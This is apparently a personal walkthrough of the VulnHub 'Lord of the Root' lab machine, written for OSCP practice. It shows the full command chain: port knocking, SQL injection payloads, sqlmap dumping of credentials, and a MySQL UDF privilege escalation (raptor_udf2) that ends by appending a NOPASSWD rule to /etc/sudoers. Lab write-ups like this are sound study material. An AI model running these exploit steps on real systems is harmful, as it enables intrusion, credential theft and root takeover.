This machine is one of the machines from the OSCP preparation guide I received from one of my teachers. This machine is the next on list and it can be downloaded on: vulnhub
The challenge or goal of the machine lists the following:
This is a boot-to-root machine will not require any guest interaction.https://www.vulnhub.com/entry/lord-of-the-root-101,129/
The walk-through will be divided in a couple sections following the standard penetration testing process: Information gathering –> Exploitation –> Post exploitation. It could be divided into more steps, but for complicity we do these three.
To start of we will find the IP address of the machine with nmap since netdiscover takes a while on my VMware. We will use the command
sudo nmap -sn 192.168.0.0/24 for this. The vulnerable machine has the IP
So to start of the machine we scan the machine for open ports with nmap. We will do two scans;
sudo nmap -sV -sC 192.168.0.136 -oA nmap and
sudo nmap -sV -sC 192.168.0.136 -p- -oA fullnmap. We use these parameters for;
-sV service and version enumeration,
-sC is for basic script usage.
-p- to do a full port scan.
-oA to save all output to a couple different files.
The nmap results are;
So we only got the SSH service open. Once we SSH ssh
192.168.0.136 to the server to get the banner is shows us LOTR, knok friend to enter
I did this machine before and it was annoying, I could not do it. But I remember, we have to use a scanning tool that knocks on port 1,2,3 in this order. So I scanned the machine a couple times with
nmap -r -p 1,2,3 192.168.0.136. With -r do not randomize and -p to specify port 1, 2 and 3.
After that we did another full port scan and we found the following results:
An apache web server on port 1337. Lets start our vulnerability scan nikto and our directory fuzzer dirb.
nikto -host http://192.168.0.136:1337 -output=nikto.txt and
dirb http://192.168.0.136:1337 -o dirb.txt.
Dirb only found a couple directories:
The mainwebpage shows us a meme:
Nothing interesting in the http source code:
In the /images/ directory are three memes present. The one we saw earlier and two other. With nothing of interest again. In the webpage
/server-stat we get an 403 forbidden response.
Nikto shows us the webserver is using an old Apache version and it’s running on ubuntu.
I went to the browser and manually checked the
/robots.txt file. There is an image. So I checked the source code and found the following:
An encoded string. Might be a hash. So I checked it in
hash-identifier and it tells us it might be a tiger-192 or haval192 hash.
I could not find the hash value, maybe its just decoded. So I parsed it through some things like ROT1-24 and Base64 and it was base64 decoded. You can decode base64 in the terminal with the
base64 -d command.
It gave us an webpage. If you browse to this webpage it gives you and login screen.
So I tried some basic SQL injections but it didn’t work. Like
' or 1=1# and
' or 1=1 --. We don’t have any other entry points in the vulnerable machine, like no other ports, no other webpages. I booted up sqlmap. To easily use it we started up burp, filled in the form and saved the request to a file named request. By clicking on save item after going to the request.
This file then can be used in SQLmap instead of setting the parameters and the post method. So I ran sqlmap with the following command:
sqlmap -r Request --dbs --level=4 --risk=2 and it found a vulnerable parameter and gave us the following four databases.
So we want to find out what is in the Webapp database. We can use the following command to select the Webapp database
sqlmap -r Request --dbs --level=4 --risk=2 -D Webapp -tables. It gave us one table, named Users.
Lets select this table and see what is in there.
We got three columns; id, password and username. We can use the following command to both dump the username and the password.
sqlmap -r Request --dbs --level=4 --risk=2 -D Webapp -T Users -C username,password --dump. It gave us the following accounts:
gimli :AndMyAxe legolas:AndMyBow aragorn:AndMySword frodo:iwilltakethering smeagol:MyPreciousR00t
So I tried SSH’ing into the server and could only log in with the smeagol account
While looking around for a privilege escalation technique I saw that multiple services are running as root. Apache, mysql etc.
In the webdirectory /var/www/978345210 we found the file login.php containing mysql credentials.
I also checked if we could write anything to these folders or files. But unfortunately we could not. Would be an easy reverse shell ^^ With the command
mysql -u root -p and the password darkshadow we could login to the mysql database. I can stop the sqlmap since I was checking the other databases in the meantime. So I found an exploit we can use to get root access.
So lets do this exploit. First we have to download it with
wget https://www.exploit-db.com/raw/1518. Following the commented exploit steps inside the exploit its easier to rename it to
raptor_udf2.c. Compiling the exploit
gcc -g -c raptor_udf2.c
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc, log back in to the database
mysql -u root -p with the password darkshadow. Then we issue the following mysql commands:
mysql> use mysql; mysql> create table foo(line blob); mysql> insert into foo values(load_file('/home/smeagol/raptor_udf2.so')); mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so'; mysql> create function do_system returns integer soname 'raptor_udf2.so'; mysql> select * from mysql.func; +-----------+-----+----------------+----------+ | name | ret | dl | type | +-----------+-----+----------------+----------+ | do_system | 2 | raptor_udf2.so | function | +-----------+-----+----------------+----------+ mysql> select do_system('id > /tmp/out; chown raptor.raptor /tmp/out'); mysql> \! sh $ cat /tmp/out uid=0(root) gid=0(root) groups=0(root) mysql> select do_system('echo "smeagol ALL =(ALL) NOPASSWD: ALL" >> /etc/sudoers') mysql> exit Bye smeagol@LordOfTheRoot:~$ sudo su root@LordOfTheRoot:/home/smeagol# id && whoami uid=0(root) gid=0(root) groups=0(root) root root@LordOfTheRoot:/home/smeagol#
Dammn the mysql priv esc took me some time, way longer then expected. But I had to figure out how it worked and all to get it working and found some errors on the way while doing “create function do_system returns integer soname ‘raptor_udf2.so’;” It all worked when I did it in smeagol’s home directory instead of /tmp. Even had to reset the machine two times to start over.